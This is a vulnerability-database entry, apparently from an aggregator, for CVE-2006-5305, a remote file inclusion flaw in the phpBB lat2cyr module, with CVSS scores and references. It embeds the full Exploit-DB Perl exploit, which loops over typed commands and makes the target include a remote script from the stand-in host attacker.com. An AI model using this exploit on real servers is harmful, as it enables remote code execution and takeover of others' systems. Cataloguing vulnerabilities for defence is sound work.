ID CVE-2006-5305Type cveReporter cve@mitre.orgModified 2018-10-17T21:42:00
Description
PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Successful exploitation requires that "register_globals" is enabled.
{"id": "CVE-2006-5305", "bulletinFamily": "NVD", "title": "CVE-2006-5305", "description": "PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.\nSuccessful exploitation requires that \"register_globals\" is enabled.", "published": "2006-10-17T15:07:00", "modified": "2018-10-17T21:42:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5305", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/22432", "http://www.securityfocus.com/archive/1/448660/100/0/threaded", "http://www.securityfocus.com/bid/20513", "http://www.vupen.com/english/advisories/2006/4050", "https://www.exploit-db.com/exploits/2546", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29572", "http://securityreason.com/securityalert/1729"], "cvelist": ["CVE-2006-5305"], "type": "cve", "lastseen": "2019-05-29T18:08:34", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "c852211a2ab202a01e5209c21ac68846"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "f6b4172771a4037ddba687835d138152"}, {"key": "cvss", "hash": "1e7c2c7ebabdae1d396543cea1053bd4"}, {"key": "cvss2", "hash": "c3c5fe26c369fd6cac11b27616fee883"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "17ac5319c5aa21d372ebfcea78ee6b2a"}, {"key": "href", "hash": "60c9af82ccef3685ed592c94930a7212"}, {"key": "modified", "hash": "7c5b0816ab4ae0609164857583a5ebb3"}, {"key": "published", "hash": "50b2043986263c6e2d7c9183aaf241d6"}, {"key": "references", "hash": "7f452b2cbb84416906ff054e2865adfb"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "706cfd92e4017053a1361281d2739899"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c586db9cfa0d3aca139df95e6b83b4699cb7bcbff26298e63a5a023c9946d3f3", "viewCount": 0, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2019-05-29T18:08:34"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:29736"]}, {"type": "exploitdb", "idList": ["EDB-ID:2546"]}], "modified": "2019-05-29T18:08:34"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [{"name": "phpbb lat2cyr", "operator": "le", "version": "1.0.1"}], "cvss2": {"cvssV2": {"accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T16:31:19", "bulletinFamily": "exploit", "description": "phpBB lat2cyr Mod 1.0.1 (lat2cyr.php) Remote File Include Exploit. CVE-2006-5305. Webapps exploit for php platform", "modified": "2006-10-13T00:00:00", "published": "2006-10-13T00:00:00", "id": "EDB-ID:2546", "href": "https://www.exploit-db.com/exploits/2546/", "type": "exploitdb", "title": "phpBB lat2cyr Mod 1.0.1 lat2cyr.php Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n#####################################################################################################\n# #\n# phpBB lat2cyr 1.0.1 #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://www.phpbbhacks.com/download/4808 #\n# #\n#####################################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"##########################################################################\\n\";\nprint \"# #\\n\";\nprint \"# phpBB lat2cyr <= 1.0.1 Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"##########################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"lat2cyr.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2546/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.phpbbhacks.com/download/4808\n[Secunia Advisory ID:22432](https://secuniaresearch.flexerasoftware.com/advisories/22432/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0220.html\nISS X-Force ID: 29572\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2546\nFrSIRT Advisory: ADV-2006-4050\n[CVE-2006-5305](https://vulners.com/cve/CVE-2006-5305)\nBugtraq ID: 20513\n", "modified": "2006-10-12T11:48:57", "published": "2006-10-12T11:48:57", "href": "https://vulners.com/osvdb/OSVDB:29736", "id": "OSVDB:29736", "title": "lat2cyr for phpBB lat2cyr.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
